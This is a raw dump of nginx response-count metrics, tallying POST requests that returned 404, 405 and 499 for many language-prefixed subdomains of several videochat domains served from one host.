nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.show"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.tv.br"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pkiaram.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.date"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.world"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="portal.th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="portal.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.cafe"} 259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.date"} 154 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.mx"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.world"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="qdrqgda.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="qshicka.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.date"} 131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.mx"} 209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.world"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ryfusmrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.cafe"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.mx"} 171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.tv.br"} 467 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.world"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="shop.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.cafe"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.date"} 118 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.mx"} 219 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.world"} 263 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.cafe"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.date"} 269 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.world"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sptlqmk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.date"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.tv.br"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="staging.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="store.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.world"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="support.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.cafe"} 276 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.date"} 277 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.show"} 269 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.world"} 279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.mx"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.date"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.world"} 313 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.cafe"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.world"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="test.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.world"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="th.videochat.world"} 196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.date"} 171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tl.videochat.world"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.cafe"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tr.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tt.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.tv.br"} 435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="udm.videochat.world"} 502 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.date"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.mx"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uk.videochat.world"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ur.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.tv.br"} 582 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="uz.videochat.world"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vi.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.cafe"} 1904 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.date"} 1952 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.mx"} 1112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.show"} 338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.tv.br"} 2009 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="videochat.world"} 810 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="vmi460104.contaboserver.net"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="waqqvxh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="wngqune.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="wordpress.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="wp.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.date"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="www.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xbodfbs.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.tv.br"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="xh.videochat.world"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ybifrit.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="yi.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.date"} 172 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="zh.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="405",vhost="videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="127.0.0.1"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="127.0.0.1:8080"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="161.97.120.25"} 412 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="161.97.120.25:80"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="am.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="am.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="am.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ba.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="be.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="be.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="bn.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="bn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ceb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="chm.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="cs.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="cs.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="da.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="da.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="de.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ee.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ee.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fa.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="fr.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ga.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="gl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="gu.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="he.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ht.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ht.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ht.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hu.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="hu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="id.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="id.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="is.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="it.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="it.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="it.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jp.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jp.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="jv.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="km.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ko.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lb.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="lv.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mi.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mk.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ml.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ml.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ms.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="my.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ne.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="no.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pt.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="pt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="ro.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="si.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sk.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="499",vhost="sl.videochat.world"} 1 